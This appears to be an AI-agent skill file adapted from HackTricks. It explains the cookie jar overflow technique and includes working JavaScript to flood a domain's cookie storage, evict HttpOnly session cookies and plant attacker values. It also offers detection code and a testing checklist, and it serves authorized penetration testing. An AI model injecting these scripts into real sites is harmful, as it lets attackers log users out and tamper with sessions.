Hacktricks-skills cookie-jar-overflow

Web pentesting technique to overflow browser cookie storage and force deletion of existing cookies. Use this skill when testing for cookie manipulation vulnerabilities, when you need to remove or overwrite HttpOnly cookies, or when analyzing cookie-based authentication bypass scenarios. Trigger this skill for any cookie-related security testing, browser storage attacks, or session manipulation tasks.

git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/hacking-with-cookies/cookie-jar-overflow/SKILL.MD

Cookie Jar Overflow

A browser-based attack technique that exploits the limit on cookies per domain to force deletion of existing cookies, including HttpOnly cookies.

What is Cookie Jar Overflow?

Browsers enforce a limit on the number of cookies that can be stored per domain (typically 18-200 cookies depending on browser). When this limit is exceeded, the browser automatically deletes the oldest cookies to make room for new ones. This behavior can be weaponized to:

  • Force deletion of specific cookies - including session tokens
  • Overwrite HttpOnly cookies - by deleting them and setting a new value
  • Bypass cookie-based security controls - by removing authentication cookies

When to Use This Technique

Use cookie jar overflow when:

  1. Testing cookie-based authentication - Can you force logout by overflowing the jar?
  2. Analyzing HttpOnly cookie security - Can you manipulate cookies marked as HttpOnly?
  3. Session fixation attacks - Can you remove existing session cookies?
  4. Cookie persistence testing - How does the application handle missing cookies?
  5. Third-party cookie scenarios - Understanding domain-specific cookie limits

Implementation

Basic Cookie Overflow

// Set many cookies to overflow the jar
for (let i = 0; i < 700; i++) {
  document.cookie = `cookie${i}=${i}; Secure; SameSite=None; path=/`
}

// Remove all cookies by setting expiration to past date
for (let i = 0; i < 700; i++) {
  document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/`
}

Targeted Cookie Deletion

// First, overflow to delete the target cookie
for (let i = 0; i < 700; i++) {
  document.cookie = `overflow${i}=${i}; path=/`
}

// Then set your desired cookie value
document.cookie = `target_cookie=malicious_value; path=/`

Complete Attack Script

// Cookie Jar Overflow Attack
function overflowCookieJar(targetCookieName) {
  const NUM_COOKIES = 700;
  
  // Phase 1: Overflow the cookie jar
  console.log(`[+] Setting ${NUM_COOKIES} cookies to overflow jar...`);
  for (let i = 0; i < NUM_COOKIES; i++) {
    document.cookie = `overflow_${i}=${i}; path=/; SameSite=None; Secure`
  }
  
  // Phase 2: Clean up overflow cookies
  console.log('[+] Cleaning up overflow cookies...');
  for (let i = 0; i < NUM_COOKIES; i++) {
    document.cookie = `overflow_${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/`
  }
  
  // Phase 3: Set target cookie (if needed)
  if (targetCookieName) {
    console.log(`[+] Setting target cookie: ${targetCookieName}`);
    document.cookie = `${targetCookieName}=attacker_value; path=/`
  }
  
  console.log('[+] Cookie jar overflow complete');
}

Important Considerations

Third-Party Cookies

Cookies belonging to other domains are not affected by this technique: each domain has its own cookie jar and its own limit.

HttpOnly Cookies

While HttpOnly cookies cannot be read via JavaScript, they CAN be deleted through cookie jar overflow. After deletion, you can set a new cookie with the same name (though it won't have the HttpOnly flag).
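The eviction behaviour described above can be reproduced with a small model of a per-domain jar. This is an added example, not code from the original page; the class and function names are hypothetical, the limit of 180 is taken from the figures on this page, and oldest-first eviction is a simplification of what real browsers do.

```javascript
// Added example: simplified per-domain cookie jar. Real browsers use more
// elaborate eviction policies; oldest-first follows this page's description.
const JAR_LIMIT = 180; // assumption, taken from the page's ~180 figure

class CookieJarModel {
  constructor(limit = JAR_LIMIT) {
    this.limit = limit;
    this.cookies = new Map(); // Map keeps insertion order: first key is oldest
  }

  // source is 'http' (Set-Cookie response header) or 'script' (document.cookie)
  set(name, value, { httpOnly = false, source = 'http' } = {}) {
    const existing = this.cookies.get(name);
    // Scripts can neither create nor overwrite an HttpOnly cookie directly
    if (source === 'script' && (httpOnly || (existing && existing.httpOnly))) {
      return false;
    }
    this.cookies.delete(name); // model choice: a rewrite counts as newest
    this.cookies.set(name, { value, httpOnly });
    while (this.cookies.size > this.limit) {
      this.cookies.delete(this.cookies.keys().next().value); // evict oldest
    }
    return true;
  }

  get(name) {
    return this.cookies.get(name);
  }
}

function runJarModel() {
  const jar = new CookieJarModel();
  jar.set('session_id', 'server-issued', { httpOnly: true });
  // A direct script write to the HttpOnly cookie is refused
  const directWrite = jar.set('session_id', 'x', { source: 'script' });
  for (let i = 0; i < JAR_LIMIT; i++) {
    jar.set(`filler${i}`, String(i), { source: 'script' });
  }
  const evicted = jar.get('session_id') === undefined;
  // With the original evicted, the same script write is now accepted
  const rewrite = jar.set('session_id', 'x', { source: 'script' });
  return { directWrite, evicted, rewrite, httpOnly: jar.get('session_id').httpOnly };
}
```

The final `httpOnly: false` is the finding to record: the cookie that replaces the evicted one is readable and writable by any script on the page.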

Browser Variations

Different browsers have different cookie limits:

  • Chrome: ~180 cookies per domain
  • Firefox: ~180 cookies per domain
  • Safari: ~180 cookies per domain
  • Edge: ~180 cookies per domain

Modern Browser Protections

  • SameSite cookies: May limit cross-site cookie setting
  • Secure flag: Marks a cookie as HTTPS-only; such cookies can only be set from a secure (HTTPS) context
  • Cookie partitioning: Some browsers isolate cookies per site

Testing Checklist

When testing with this technique:

  • Verify the application's cookie storage limits
  • Test with different cookie attributes (Secure, HttpOnly, SameSite)
  • Check if session cookies can be removed
  • Verify application behavior when cookies are missing
  • Test third-party cookie scenarios
  • Document browser-specific behaviors
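For the "check if session cookies can be removed" item, the server side can be instrumented to notice the flood while it is in progress: the Cookie request header carries only names and values, but a jar being overflowed shows up as an abnormal cookie count and long runs of numbered names. The following is an added example, not part of the original page; the thresholds, the `session_id` name and the sample headers are assumptions constructed for illustration.

```javascript
// Added example: server-side heuristic for cookie jar flooding.
// Thresholds and the session cookie name are assumptions; tune per application.
const MAX_EXPECTED_COOKIES = 30; // assumed ceiling for the app's own cookies
const MIN_NUMBERED_RUN = 20;     // assumed: this many <prefix><N> names is filler
const SESSION_COOKIE = 'session_id';

function parseCookieHeader(header) {
  return header.split(';').map(p => p.trim()).filter(Boolean).map(p => {
    const eq = p.indexOf('=');
    return eq === -1
      ? { name: '', value: p }
      : { name: p.slice(0, eq), value: p.slice(eq + 1) };
  });
}

function inspectCookieHeader(header) {
  const cookies = parseCookieHeader(header);
  const findings = [];
  if (cookies.length > MAX_EXPECTED_COOKIES) findings.push('cookie-count');

  // Group names of the form <prefix><digits> and count each prefix
  const runs = new Map();
  for (const { name } of cookies) {
    const m = /^(.*?)(\d+)$/.exec(name);
    if (m) runs.set(m[1], (runs.get(m[1]) || 0) + 1);
  }
  for (const [prefix, n] of runs) {
    if (n >= MIN_NUMBERED_RUN) findings.push(`numbered-run:${prefix}`);
  }

  // A missing session cookie only matters here when a flood is also visible
  const flooded = findings.length > 0;
  const hasSession = cookies.some(c => c.name === SESSION_COOKIE);
  if (flooded && !hasSession) findings.push('session-absent');
  return findings;
}

// Constructed sample Cookie headers (not captured traffic)
const NORMAL_HEADER = 'session_id=abc123; theme=dark; lang=en';
const FLOODED_HEADER = Array.from({ length: 180 }, (_, i) => `overflow_${i}=${i}`).join('; ');
const REPLANTED_HEADER = FLOODED_HEADER + '; session_id=attacker_value';
```

A request that trips `cookie-count` or `numbered-run` is a reasonable point to invalidate the session server-side and reissue it with a fresh `Set-Cookie`.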

Example Attack Scenarios

Scenario 1: Session Logout

Force a user to log out by removing their session cookie:

// Inject this script to force logout
overflowCookieJar('session_id');

Scenario 2: Cookie Value Manipulation

Overwrite a preference cookie:

// Overflow to delete, then set new value
overflowCookieJar('user_preferences');
document.cookie = 'user_preferences=malicious_config; path=/';

Scenario 3: Authentication Bypass

Remove authentication cookies to test fallback mechanisms:

// Remove auth cookies and observe behavior
overflowCookieJar('auth_token');
overflowCookieJar('csrf_token');

Safety Notes

  • Only use this technique on systems you own or have explicit permission to test
  • Document all findings for the security team
  • Consider the impact on legitimate users during testing
  • Test in isolated environments when possible